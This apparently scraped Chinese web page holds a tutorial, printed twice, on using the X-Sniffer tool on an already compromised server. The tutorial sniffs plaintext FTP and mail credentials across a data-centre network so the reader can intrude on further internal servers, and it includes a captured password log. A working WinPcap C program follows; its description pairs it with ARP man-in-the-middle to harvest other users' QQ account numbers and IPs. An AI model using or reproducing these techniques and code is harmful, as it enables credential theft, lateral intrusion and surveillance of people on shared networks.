一 : 嗅探局域网内所有密码
嗅探局域网内所有密码.txt不要放弃自己! -------(妈妈曾经这样对我说,转身出门的一刹那,我泪流满面,却不想让任何人看见!) 看到这一句小编也心有感触,想起当初离家前往几千里外的地方的时候,妈妈也说过类似的话,但是身为男儿,必须创出一片天,才能报答父母的养育之恩!!大家好,今天给大家做个教程的名字叫较“嗅探局域网内的所有密码” 我的QQ是362978388 大家有什么问题尽管问我,我会耐心解答。我的BLog http://safely.blogbus.com/
废话少说 下面开始教程内容 有很多朋友提权拿到服务器以后还想继续入侵几台内网服务器,现在大部
服务器都是在内网的机房里 下面看我操作 用到这个工具 X-Sniffer 我这个是GUI版的 先传到服务器里
去 用FTP传吧 提醒一下 这个程序只能嗅探内网里的密码 大部分的密码 很牛逼 嗅探出密码我们就可以
下一步的入侵 使用很简单 按一下开始监听就可以了 下面我在服务器里做实验 我登陆我的FTP
看进来了 看看嗅探出来了吗 生成出一个pass.log 文件
TCP [10/27/07 23:28:31]
62.10.70.92->222.141.207.175 Port: 3905->25
MAIL FROM:<matheaw_wigfield@INJECTRON.COM> SIZE=699
TCP [10/27/07 23:28:32]
62.10.70.92->222.141.207.175 Port: 3905->25
RCPT TO:<gozarucaya@falani.net>
TCP [10/27/07 23:28:33]
222.141.207.175->222.39.217.204 Port: 3017->21
USER anonymous
TCP [10/27/07 23:28:33]
222.141.207.175->222.39.217.204 Port: 3017->21
PASS IEUser@
TCP [10/27/07 23:28:40]
222.141.207.175->222.39.217.204 Port: 3040->21
USER Panney
TCP [10/27/07 23:28:40]
222.141.207.175->222.39.217.204 Port: 3040->21
PASS password
TCP [10/27/07 23:28:41]
222.141.207.175->222.39.217.204 Port: 3044->21
USER Panney
TCP [10/27/07 23:28:41]
222.141.207.175->222.39.217.204 Port: 3044->21
PASS password
Panney是用户名 password 是密码 怎么样 这个可以嗅探整个机房的密码
不光是FTP 所有明文密码他都可以嗅探 好了 教程就到这里了
记住 有不明白的一定我加我的QQ:362978388 找不到工具的也可以问我要
我会耐心解答 88~
二 : 嗅探局域网内所有密码
嗅探局域网内所有密码.txt不要放弃自己! -------(妈妈曾经这样对我说,转身出门的一刹那,我泪流满面,却不想让任何人看见!) 看到这一句小编也心有感触,想起当初离家前往几千里外的地方的时候,妈妈也说过类似的话,但是身为男儿,必须创出一片天,才能报答父母的养育之恩!!大家好,今天给大家做个教程的名字叫较“嗅探局域网内的所有密码” 我的QQ是362978388 大家有什么问题尽管问我,我会耐心解答。(www.61k.com)我的BLog http://safely.blogbus.com/ 废话少说 下面开始教程内容 有很多朋友提权拿到服务器以后还想继续入侵几台内网服务器,现在大部服务器都是在内网的机房里 下面看我操作 用到这个工具 X-Sniffer 我这个是GUI版的 先传到服务器里去 用FTP传吧 提醒一下 这个程序只能嗅探内网里的密码 大部分的密码 很牛逼 嗅探出密码我们就可以下一步的入侵 使用很简单 按一下开始监听就可以了 下面我在服务器里做实验 我登陆我的FTP看进来了 看看嗅探出来了吗 生成出一个pass.log 文件TCP [10/27/07 23:28:31]62.10.70.92->222.141.207.175 Port: 3905->25MAIL FROM:<matheaw_wigfield@INJECTRON.COM> SIZE=699TCP [10/27/07 23:28:32]62.10.70.92->222.141.207.175 Port: 3905->25RCPT TO:<gozarucaya@falani.net>TCP [10/27/07 23:28:33]222.141.207.175->222.39.217.204 Port: 3017->21USER anonymousTCP [10/27/07 23:28:33]222.141.207.175->222.39.217.204 Port: 3017->21PASS IEUser@TCP [10/27/07 23:28:40]222.141.207.175->222.39.217.204 Port: 3040->21USER PanneyTCP [10/27/07 23:28:40]222.141.207.175->222.39.217.204 Port: 3040->21PASS passwordTCP [10/27/07 23:28:41]222.141.207.175->222.39.217.204 Port: 3044->21USER PanneyTCP [10/27/07 23:28:41]222.141.207.175->222.39.217.204 Port: 3044->21PASS passwordPanney是用户名 password 是密码 怎么样 这个可以嗅探整个机房的密码 不光是FTP 所有明文密码他都可以嗅探 好了 教程就到这里了记住 有不明白的一定我加我的QQ:362978388 找不到工具的也可以问我要 我会耐心解答 88~
三 : winpcap编程之局域网QQ号码嗅探
在交换网络中,结合arp中间人,把别人的包转到自己机子上,分析QQ协议进行判断QQ号码。
/**//* QQ_sniff by xklxlmw*/
#include <pcap.h>
#pragma comment(lib, "wpcap.lib")
#pragma comment(lib, "Packet.lib")
#pragma comment(lib, "wsock32.lib")//hton()函数用到
#pragma pack(1)//内存对齐,使内存紧凑
/**//*
-----------------------------------------------------------------------------------------------------------------------
下面是以太网协议格式的定义
-----------------------------------------------------------------------------------------------------------------------
*/
struct ether_header
...{
u_int8_t ether_dhost[6];
/**//* 目的以太网地址 */
u_int8_t ether_shost[6];
/**//* 源以太网地址 */
u_int16_t ether_type;
/**//* 以太网类型 */
};
/**//* 下面是IP地址格式的定义 */
typedef u_int32_t in_addr_t;
/**//*
-----------------------------------------------------------------------------------------------------------------------
下面是IP协议格式的定义
-----------------------------------------------------------------------------------------------------------------------
*/
struct ip_header
...{
#if defined(WORDS_BIGENDIAN)
u_int8_t ip_version: 4, /**//* 版本 */
ip_header_length: 4; /**//* 首部长度 */
#else
u_int8_t ip_header_length: 4, ip_version: 4;
#endif
u_int8_t ip_tos;
/**//* 服务质量 */
u_int16_t ip_length;
/**//* 总长度 */
u_int16_t ip_id;
/**//* 标识 */
u_int16_t ip_off;
/**//* 偏移 */
u_int8_t ip_ttl;
/**//* 生存时间 */
u_int8_t ip_protocol;
/**//* 协议类型 */
u_int16_t ip_checksum;
/**//* 校验和 */
struct in_addr ip_souce_address;
/**//* 源IP地址 */
struct in_addr ip_destination_address;
/**//* 目的IP地址 */
};
/**//*
-----------------------------------------------------------------------------------------------------------------------
下面是UDP协议格式的定义
-----------------------------------------------------------------------------------------------------------------------
*/
struct udp_header
...{
u_int16_t udp_source_port;
/**//* 源端口号 */
u_int16_t udp_destination_port;
/**//* 目的端口号 */
u_int16_t udp_length;
/**//* 长度 */
u_int16_t udp_checksum;
/**//* 校验和 */
};
/**//*
-----------------------------------------------------------------------------------------------------------------------
下面是QQ协议格式的定义
-----------------------------------------------------------------------------------------------------------------------
*/
typedef struct qq_udp_header
...{
u_char begin_tag; //always 0x02 till now
u_short sender_ver; //client version, details below
u_short qq_cmd; //command code, QQ_CMD_XXX
u_short sq_no; //sequence number.
u_char data[1]; //following are data.
};
#pragma pack()
unsigned int swapu32(unsigned int n) //u_int网络字节转换
...{
// In fact htonl() return it!
return(((n & 0xff000000) >> 24) | ((n & 0x000000ff) << 24) |
((n & 0x00ff0000) >> 8) | ((n & 0x0000ff00) << 8));
}
/**//*
=======================================================================================================================
下面是实现捕获和分析QQ协议数据包的函数定义
=======================================================================================================================
*/
qq_protocol_packet_callback(u_char *argument, const struct pcap_pkthdr *packet_header, const u_char *packet_content)
...{
static u_int QQ_Num;//QQ号
struct ip_header *pip_header;//IP协议数据变量
struct qq_udp_header *qq_protocol;//QQ协议数据变量
pip_header=(struct ip_header*)(packet_content + 14);//获得IP协议数据变量
qq_protocol = (struct qq_udp_header*)(packet_content + 14+20+8);//获得QQ协议数据变量
//判断QQ协议包,取QQ号 如果是01 00表示是发往服务器的包前面tag也是0x02,但QQ号不在原来位置//
if((qq_protocol->begin_tag==0x02)&&(qq_protocol->sender_ver==ntohs(0x0100)))
...{
if(QQ_Num!=swapu32( *(unsigned int*)(qq_protocol->data-1)))
...{
QQ_Num=swapu32( *(unsigned int*)(qq_protocol->data-1));
printf("监听到一个QQ号:%-10u IP: %s ",QQ_Num,inet_ntoa(pip_header->ip_souce_address));
// printf("%x %x ",*(u_char*)(&(qq_protocol->begin_tag)+16),*(u_short*)(&(qq_protocol->sender_ver)+8));
}
}
if((qq_protocol->begin_tag==0x02)&&(qq_protocol->sender_ver!=ntohs(0x0100)))
...{
if(QQ_Num!=swapu32( *(unsigned int*)qq_protocol->data))
...{
QQ_Num=swapu32( *(unsigned int*)qq_protocol->data);
printf("监听到一个QQ号:%-10u IP: %s ",QQ_Num,inet_ntoa(pip_header->ip_souce_address));
// printf("%x %x ",*(u_char*)(&(qq_protocol->begin_tag)+16),*(u_short*)(&(qq_protocol->sender_ver)+8));
}
}
if((*(u_char*)(&(qq_protocol->begin_tag)+16)==0x02)&&(*(u_short*)(&qq_protocol->sender_ver+8)==ntohs(0x0100)))
...{
if(QQ_Num!=swapu32( *(unsigned int*)(qq_protocol->data+15)))
...{
QQ_Num=swapu32( *(unsigned int*)(qq_protocol->data+15));
printf("监听到一个QQ号:%-10u IP: %s ",QQ_Num,inet_ntoa(pip_header->ip_souce_address));
}
}
}
/**//*
=======================================================================================================================
下面是实现捕获和分析UDP协议数据包的函数定义
=======================================================================================================================
*/
void udp_protocol_packet_callback(u_char *argument, const struct pcap_pkthdr *packet_header, const u_char *packet_content)
...{
struct udp_header *udp_protocol;
/**//* UDP协议数据变量 */
u_short source_port;
/**//* 源端口号 */
u_short destination_port;
/**//* 目的端口号 */
u_short length;
/**//* 长度 */
udp_protocol = (struct udp_header*)(packet_content + 14+20);
/**//* 获得UDP协议数据内容 */
source_port = ntohs(udp_protocol->udp_source_port);
/**//* 获得源端口号 */
destination_port = ntohs(udp_protocol->udp_destination_port);
/**//* 获得目的端口号 */
length = ntohs(udp_protocol->udp_length);
/**//* 获得长度 */
if((length!=0)&&(destination_port==8000))
qq_protocol_packet_callback(argument, packet_header, packet_content);
}
/**//*
=======================================================================================================================
下面是分析IP协议的函数的定义
=======================================================================================================================
*/
void ip_protocol_packet_callback(u_char *argument, const struct pcap_pkthdr *packet_header, const u_char *packet_content)
...{
struct ip_header *ip_protocol;
/**//* IP协议变量 */
ip_protocol = (struct ip_header*)(packet_content + 14);
/**//* 获得IP协议数据内容 */
switch (ip_protocol->ip_protocol)
...{
case 17:
udp_protocol_packet_callback(argument, packet_header, packet_content);
break;
/**//* 如果上层协议为UDP协议,就调用分析UDP协议的函数,注意此时的参数传递形式 */
default:
break;
}
}
/**//*
=======================================================================================================================
下面是分析以太网协议的回调函数的定义
=======================================================================================================================
*/
void ethernet_protocol_packet_callback(u_char *argument, const struct pcap_pkthdr *packet_header, const u_char *packet_content)
...{
u_short ethernet_type;
/**//* 以太网类型 */
struct ether_header *ethernet_protocol;
/**//* 以太网协议变量 */
ethernet_protocol = (struct ether_header*)packet_content;
/**//* 获得以太网协议数据内容 */
ethernet_type = ntohs(ethernet_protocol->ether_type);
/**//* 获得以太网类型 */
switch (ethernet_type)
...{
case 0x0800:
ip_protocol_packet_callback(argument, packet_header, packet_content);
break;
/**//* 上层协议为IP协议,就调用分析IP 协议的函数,注意参数的传递 */
default:
break;
}
}
void main()
...{
pcap_if_t *alldevs;
char error_content[PCAP_ERRBUF_SIZE];
/**//**//**//* 存储错误信息 */
pcap_t *pcap_handle;
/**//**//**//* winpcap句柄 */
bpf_u_int32 net_mask;
/**//**//**//* 掩码地址 */
bpf_u_int32 net_ip;
/**//**//**//* 网络地址 */
char *net_interface;
/**//**//**//* 网络接口 */
struct bpf_program bpf_filter;
/**//**//**//* BPF过滤规则 */
char bpf_filter_string[] = "ip";
/**//**//**//* 过滤规则字符串 */
// net_interface = pcap_lookupdev(error_content); //因为第一个是moden的网卡,所以不用这个
if (pcap_findalldevs(&alldevs,error_content) == -1)
...{
fprintf(stderr,"Error in pcap_findalldevs: %s ",error_content);
exit(1);
}
net_interface=alldevs->next->name;//得到第二个网卡(以太网卡)的名字
/**//**//**//* 获得网络接口 */
pcap_lookupnet(net_interface, &net_ip, &net_mask, error_content);
/**//**//**//* 获得网络地址和网络掩码 */
pcap_handle = pcap_open_live(net_interface, BUFSIZ, 1, 0, error_content);
/**//**//**//* 打开网路接口 */
pcap_freealldevs(alldevs); //释放接口结点链表
pcap_compile(pcap_handle, &bpf_filter, bpf_filter_string, 0, net_ip);
/**//**//**//* 编译过滤规则 */
pcap_setfilter(pcap_handle, &bpf_filter);
/**//**//**//* 设置过滤规则 */
if (pcap_datalink(pcap_handle) != DLT_EN10MB)
return ;
printf("开始嗅探QQ号码......... ");
pcap_loop(pcap_handle, - 1, ethernet_protocol_packet_callback, NULL);
/**//* 注册回调函数,循环捕获网络数据包,调用回调函数进行分析 */
pcap_close(pcap_handle);
/**//* 关闭Winpcap操作 */
}
编程中注意:对内存取值,数组名最好不要再用取地址运算
本文标题:
局域网qq嗅探器-嗅探局域网内所有密码 本文地址:
http://www.61k.com/1117281.html